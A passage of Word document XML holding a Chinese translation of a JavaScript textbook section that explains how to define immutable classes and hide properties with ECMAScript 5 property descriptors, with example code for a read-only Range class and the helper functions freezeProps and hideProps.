      </w:pPr>
      <w:r>
        <w:t>throw Error("Can't define id for nonextensible objects");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(this,idprop,{//</w:t>
      </w:r>
      <w:r>
        <w:t>给它一个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value:nextid++,//</w:t>
      </w:r>
      <w:r>
        <w:t>就是这个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writable:false,//</w:t>
      </w:r>
      <w:r>
        <w:t>只读的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerable:false,//</w:t>
      </w:r>
      <w:r>
        <w:t>不可枚举的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>configurable:false/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>不可删除的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this[idprop];//</w:t>
      </w:r>
      <w:r>
        <w:t>返回已有的或新的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//idGetter()</w:t>
      </w:r>
      <w:r>
        <w:t>用到了这些变量，这些都属于私有变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var idprop="|**objectId**|";//</w:t>
      </w:r>
      <w:r>
        <w:t>假设这个属性没有用到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var nextid=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>给它设置初始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}());//</w:t>
      </w:r>
      <w:r>
        <w:t>立即执行这个包装函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="250" w:name="9_8_2_Ding_Yi_Bu_Ke_Bian_De_Lei_"/>
      <w:r>
        <w:t>9.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　定义不可变的类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="250"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>除了可以设置属性为不可枚举的，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>还可以设置属性为只读的，当我们希望类的实例都是不可变的，这个特性非常有帮助。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-18</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>定义不可变的</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类。它同样使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>来为类创建原型对象，并将（原型对象的）实例方法设置为不可枚举的，就像内置类的方法一样。不仅如此，它还将这些实例方法设置为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>只读</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不可删除</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，这样就可以防止对类做任何修改（</w:t>
      </w:r>
      <w:r>
        <w:t>monkey-patching</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[13]</w:t>
      </w:r>
      <w:r>
        <w:t>。最后，例</w:t>
      </w:r>
      <w:r>
        <w:t>9-18</w:t>
      </w:r>
      <w:r>
        <w:t>展示了一个有趣的技巧</w:t>
      </w:r>
      <w:r>
        <w:t>，其中实现的构造函数也可以用做工厂函数，这样不论调用函数之前是否带有</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>关键字，都可以正确地创建实例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-18</w:t>
      </w:r>
      <w:r>
        <w:t>：创建一个不可变的类，它的属性和方法都是只读的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>调用，也可以省略</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>，它可以用做构造函数也可以用做工厂函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Range(from,to){//</w:t>
      </w:r>
      <w:r>
        <w:t>这些是对</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>只读属性的描述符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var props={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>from:{value:from,enumerable:true,writable:false,configurable:false},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>:{value:to,enumerable:true,writable:false,configurable:false}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this instanceof Range)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果作为构造函数来调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperties(this,props);//</w:t>
      </w:r>
      <w:r>
        <w:t>定义属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，作为工厂方法来调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Object.create(Range.prototype,//</w:t>
      </w:r>
      <w:r>
        <w:t>创建并返回这个新</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>props);//</w:t>
      </w:r>
      <w:r>
        <w:t>属性由</w:t>
      </w:r>
      <w:r>
        <w:t>props</w:t>
      </w:r>
      <w:r>
        <w:t>指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果用同样的方法给</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>ange.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>对象添加属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>那么我们需要给这些属性设置它们的特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因为我们无法识别出它们的可枚举性、可写性或可配置性，这些属性特性默认都是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperties(Range.prototype,{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>includes:{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value:function(x){return this.from</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value:function(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var </w:t>
      </w:r>
      <w:r>
        <w:t>x=Math.ceil(this.from);x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;x++)f(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value:function(){return"("+this.from+"..."+this.to+")";}</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9-18</w:t>
      </w:r>
      <w:r>
        <w:t>用到了</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>来定义不可变的和不可枚举的属性。这两个方法非常强大，但属性描述符对象让代码的可读性变得更差。另一种改进的做法是将修改这个已定义属性的特性的操作定义为一个工具函数，例</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>-19</w:t>
      </w:r>
      <w:r>
        <w:t>展示了两个这样的工具函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-19</w:t>
      </w:r>
      <w:r>
        <w:t>：属性描述符工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的指定名字（或所有）的属性设置为不可写的和不可配置的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function freezeProps(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var props=(arguments.length==1)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果只有一个参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>?Object.getOwnPropertyNames(o)//</w:t>
      </w:r>
      <w:r>
        <w:t>使用所有的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>:Array.prototype.splice.call(arguments,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则传入了指定名字的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>props.forEach(function(n){/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>将它们都设置为只读的和不可变的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略不可配置的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!Object.getOwnPropertyDescriptor(o,n).configurable)return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Object.defineProperty(o,n,{writable:false,configurable:false});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return o;//</w:t>
      </w:r>
      <w:r>
        <w:t>所以我们可以继续使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的指定名字（或所有）的属性设置为不可枚举的和可配置的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function hideProps(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>props=(arguments.length==1)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果只有一个参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>?Object.getOwnPropertyNames(o)//</w:t>
      </w:r>
      <w:r>
        <w:t>使用所有的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>:Array.prototype.splice.call(arguments,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则传入了指定名字的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>props.forEach(function(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>将它们设置为不可枚举的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略不可配置的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!Object.getOwnPropertyDescriptor(o,n).configurable)return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.</w:t>
      </w:r>
      <w:r>
        <w:t>defineProperty(o,n,{enumerable:false});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return o;</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Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>可以用来创建新属性，也可以修改已有属性的特性。当用它们创建新属性时，默认的属性特性的值都是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。但当用它们修改已经存在的属性时，默认的属性特性依然保持不变。比如，在上面的</w:t>
      </w:r>
      <w:r>
        <w:t>hideProps()</w:t>
      </w:r>
      <w:r>
        <w:t>函数中，只指定了</w:t>
      </w:r>
      <w:r>
        <w:t>enumerable</w:t>
      </w:r>
      <w:r>
        <w:t>特性，因为我们只想修改</w:t>
      </w:r>
      <w:r>
        <w:t>enumerable</w:t>
      </w:r>
      <w:r>
        <w:t>特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用这些工具函数</w:t>
      </w:r>
      <w:r>
        <w:t>，就可以充分利用</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的特性来实现一个不可变的类，而且不用动态地修改这个类。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-20</w:t>
      </w:r>
      <w:r>
        <w:t>中不可变的</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类就用到了刚才定义的工具函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-20</w:t>
      </w:r>
      <w:r>
        <w:t>：一个简单的不可变的类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Range(from,to){//</w:t>
      </w:r>
      <w:r>
        <w:t>不可变的类</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.from=from;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.to=to;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>freezeProps(this);//</w:t>
      </w:r>
      <w:r>
        <w:t>将属性设置为不可变的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype=hideProps({//</w:t>
      </w:r>
      <w:r>
        <w:t>使用不可枚举的属性来定义原型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>constructor:Range,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>includes:function(x){return this.from</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f){for(var x=Math.ceil(this.from);x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;x++)f(x);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){return"("+this.from+"..."+this.to+")";}</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51" w:name="9_8_3_Feng_Zhuang_Dui_Xiang_Zhuang_Tai_"/>
      <w:r>
        <w:t>9.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　封装对象状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="251"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:t>9.6.6</w:t>
      </w:r>
      <w:r>
        <w:t>节和例</w:t>
      </w:r>
      <w:r>
        <w:t>9-10</w:t>
      </w:r>
      <w:r>
        <w:t>所示，构造函数中的变量和参数可以用做它创建的对象的私有状态。该方法在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个缺点是，访问这些私有状态的存取器方法是可以替换的。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中可以通过定义属性</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法将状态变量更健壮地封装起来，这两个方法是无法删除的，如例</w:t>
      </w:r>
      <w:r>
        <w:t>9-21</w:t>
      </w:r>
      <w:r>
